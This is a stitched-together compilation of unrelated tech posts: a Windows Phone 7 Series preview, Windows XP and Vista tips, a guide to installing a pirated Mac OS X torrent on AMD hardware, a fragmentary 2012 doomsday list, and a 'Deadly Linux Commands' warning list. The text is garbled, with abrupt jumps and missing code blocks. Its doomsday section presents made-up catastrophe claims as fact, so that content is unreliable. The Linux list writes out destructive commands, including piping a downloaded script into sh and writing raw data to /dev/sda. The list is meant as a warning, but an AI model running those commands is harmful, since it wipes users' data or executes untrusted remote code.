Microsoft has done what would have been unthinkable for the company just a few years ago: started from scratch. At least, that's how things look (and feel) with Windows Phone 7 Series. This really is a completely new OS -- and not just Microsoft's new OS, it's a new smartphone OS, like webOS new, like iPhone OS new. You haven't used an interface like this before (well, okay, if you've used a Zune HD then you've kind of used an interface like this). Still, 7 Series goes wider and deeper than the Zune by a longshot, and it's got some pretty intense ideas about how you're supposed to be interacting with a mobile device. We had a chance to go hands-on with the dev phone before today's announcement, and hear from some of the people behind the devices, and here's our takeaway. (And don't worry, we've got loads of pictures and video coming, so keep checking this post for the freshest updates).

First the look and feel. The phones are really secondary here, and we want to focus on the interface. The design and layout of 7 Series' UI (internally called Metro) is really quite original, utilizing what one of the designers (Albert Shum, formerly of Nike) calls an "authentically digital" and "chromeless" experience. What does that mean? Well we can tell you what it doesn't mean -- no shaded icons, no faux 3D or drop shadows, no busy backgrounds (no backgrounds at all), and very little visual flair besides clean typography and transition animations. The whole look is strangely reminiscent of a terminal display (maybe Microsoft is recalling its DOS roots here) -- almost Tron-like in its primary color simplicity. To us, it's rather exciting. This OS looks nothing like anything else on the market, and we think that's to its advantage. Admittedly, we could stand for a little more information available within single views, and we have yet to see how the phone will handle things like notifications, but the design of the interface is definitely in a class of its own.

Start screen: the Start experience is completely revamped, now focusing on sets of tiles which represent links to applications or contacts. It's a completely contextual experience which can be customized both by users and carriers, and allows people to "promote" items higher up in the list. To the right of this screen is a long, vertical list of all your apps for quick jumps. It will take some time getting used to this layout; one or two tiles per line, and that long list which goes up and down rather than left and right, but honestly -- this does have some advantages. Things seems less out of reach in this configuration, and Microsoft swears that they'll be working closely with developers to build widgets that make use of the concept.

How To Remove One Operating System from a Dual Boot Windows XP Computer

In Windows Xp, you can install two operating systems on the same hard disk of one computer.

Whether you have two copies of Windows Xp, or two different operating systems, then you end up with dual boot machine when you restart your Windows Xp computer.

Dual boot means, the system will give you a choice of two operating system. For example, if you have two Windows Xp copies A ans B, the prompt will offer you to choose A or B to boot from.

Also, dual boot machine can be used to have Windows Xp, and Linux O.S. installed on the same computer.

In the case where you have two windows Xp copies on the same hard disk, you will experience a slow performance in your system.

If you need to delete one Windows Xp copies, and leave only one, here is how you do it:

When you restart your system, and you get a choice of two operating systems, you should choose the one you want to keep installed on your machine.

Once the startup process is done, and your computer is ready to accept tasks to perform certain functions, you click on the "My Computer" icon and locate the hard disks, removable storage devices, and more.

In the hard disk box you should see two drive icons, like "C", "D". If the copy you installed later need to be canceled, it must reside on the "D" part of the hard disk.

This is because the "C" is where you initial copy of the Windows Xp resides, and it is the one you want to keep installed as the only copy on your computer.

The way you should get rid of the "D" copy is to format the "D" part of the hard disk. just right click it, and choose format. This will delete the Windows Xp copy you don't need.

In summary, you can have two operating systems installed on your windows Xp machine, which will offer a choice of loading one of two operating systems.

The good thing is that you can cancel one, and leave the other, and your computer keeps running.

Disable Error Reporting (Win XP)

Whenever you forcefully kill some running services then Windows XP displays a dialog box called Error Reporting. If you choose 'Send Error Report' , it will report to Microsoft with entire details of your computer. Suppose you don't want to send it and you're well-aware about it so you go with 'Don't Send' but what about other people who shares your computer and don't know much more and select 'Send Error Report'.

Well, you can stop to display this dialog box easily. Just go to My Computer icon then make a right click, select 'Properties and reach to 'Advanced' tab. Just go to end of it and select 'Error Reporting' from where you can disable Error Reporting so easily. Please check real screen shots with this post.

Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL where is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.


Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal


Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Configure DEP before you sleep

DEP is Data Execution Prevention, these A new security feature in Windows Vista. DEP will monitor Windows services and programs and protect harmful code from executing or running in system memory locations reserved for Windows and other programs. Once DEP realizes an attack is in progress, it will shut the program or service automatically and notify you.

By default, DEP will only protect Windows and not other programs. You will have greater security protection by enabling DEP on all programs and services. If you have a program or service that doesn’t play nicely with DEP, you can turn DEP off for that particular service.

These steps to turn DEP on for all Windows programs and services:

1. Click the Start orb and type Control Panel.
2. Click System and Maintenance | System | Advanced System Settings.
3. UAC will prompt you to continue and choose the Advanced tab.
4. Under Performance Options, click Settings.
5. Choose the Data Execution Prevention tab.
6. Tick the Turn on DEP for all programs and services

MAC OS X on AMD.....

Heya All,
Last night I finally figured out how to install Zephiroth's Mac OS X 10.5.1 AMD DVD. Here are the steps that I used:

1. Download Zephiroth's Mac OS X 10.5.1 AMD torrent if you haven't already
2. Extract all parts of the included rar files by opening the first and selecting extract
3. Burn the extracted ISO to a DVD with Nero Burning Rom at maximum speed(I used version 7.9)
4. Format your Mac install partition as FAT32 otherwise the installer won't see it - make sure the drive you install to has an IDE interface
5. Restart and set your boot device to your CD/DVD-ROM drive
6. Let the Darwin bootloader start without any options (It will take about 5 or minutes to load the Mac OS X installer)
7. When you are loaded into the installer, select your language and click next
8. After you get to the next screen, go to the Utilities menu and select Disk Utility
9. Create and format a mac volume on your destination disk and label it "Leopard"
10. Exit Disk Utility
11. Click Next on the OS X installer
12. Click Customize and uncheck everything (you must make sure they are all unchecked or the installer will hang trying to install them)
13. First uncheck extra fonts and then expand the languages option and uncheck French
14. Proceed with unchecking everything
15. Click OK
16. Now click Install
17. Mac will now install (it will take about an hour to completely install)
18. After installation is complete, you will need to make the partition bootable
19. Boot from the DVD and hit F8
20. Type in -s

21. At the prompt, type in this:

fdisk -e /dev/rdiskX --->(X is the number of your HD, if you only have one it's 0)
update
f X --->(X is the number of the partition where you installed Leopard, usually 1 or 0) - if 0 doesn't exist, try 1
w
q
reboot
22. You will now be able to boot Leopard
23. If you have a PS2 keyboard, you will need to install the driver - skip to step 31 if you have a USB keyboard
24. The easiest way to install the driver is to copy it from your installation DVD from Windows to your Mac partition
25. Windows does not natively install support for HFS+ Mac partitions so you will need to download a program like Mac Drive to view the files
26. Once you install Mac Drive, open your Mac partition and the installation DVD in My Computer
27. Navigate to "System\Library\Extensions\" on your Mac Hard Drive and "System\Library\Extensions\" on your installation DVD
28. Locate the file "ApplePS2Controller.kext" on the installation DVD and copy it to your Mac Hard Drive
29. Restart your computer and select your Mac partition from the boot options
30. You should now be able to boot your Mac partition and use your PS2 keyboard/mouse
31. Follow the onscreen instructions to setup your user account
32. After that is complete, you now have a functional Mac OS X system running on your AMD rig!  

33. Install any other drivers that you may need for your hardware using the above method and you should be set! - a list of drivers can be found here:

7 reasons behing 21-12-2012

3. The Atom Smasher

They're predicting all manner of deadly results, including mini black holes. 4. The Bible says...
If having scientists warning us about the end of the world isn't bad enough,religious folks are getting in on the act aswell. Interpretations of the Christian Bible reveal that the date for Armageddon, the final battle between Good an Evil, has been set down for 2012. The I Ching, also known as the Chinese book of Changes, says the same thing, as do various sections of the Hindu teachings.

5. Super Volcano
Yellowstone National Park in the United States is famous for its thermal springs and Old Faithful geyser. The reason for this is simple - it's sitting on top of the world's biggest volcano, and geological experts are beginning to get nervous sweats. The Yellowstone volcano has a pattern of erupting every 650,000 years or so, and we're many years overdue for an explosion that will fill the atmosphere with ash, blocking the sun and plunging the Earth into a frozen winter that could last up to 15,000 years. This one's case of bog-simple maths mathematics. Physicists at Berekely Uni have been crunching the numbers. and they've determined that the Earth is well overdue for a major catastrophic event. Even worse, they're claiming their calculations prove, that we're all going to die, very soon - while also saying their prediction comes with a certainty of 99 percent- and 2012 just happens to be the best guess as to when it occurs.

If you need a mic(microphone) urgently and you have your headphones or earbuds or earplugs lying around then use the following trick to use them as mic.




1) Plug your headphones/earbuds/earplugs into your mic jack on the CPU.

2) Go to Start->Control Panel->Sounds, Speech and Audio Devices/ Sounds and Audio Devices. Now under the audio tab, make sure that the sound recording setting is set to your sound card. For best results turn the volume of the sound recording up to full. Similarly go to the voice tab now and change the voice recording in the same way.

3) Open the sound recorder, Start->All Programs->Accessories->Entertainment, select sound recorder.

4) Just press the record button and start recording your masterpiece.
Note that depending on the brand of headphones/earbuds/earplugs that you are using, you may have to put them fairly closer to your mouth to record the voice properly.

Deadly Linux Commands

If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.

This command will recursively and forcefully delete all the files inside the root directory.

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.
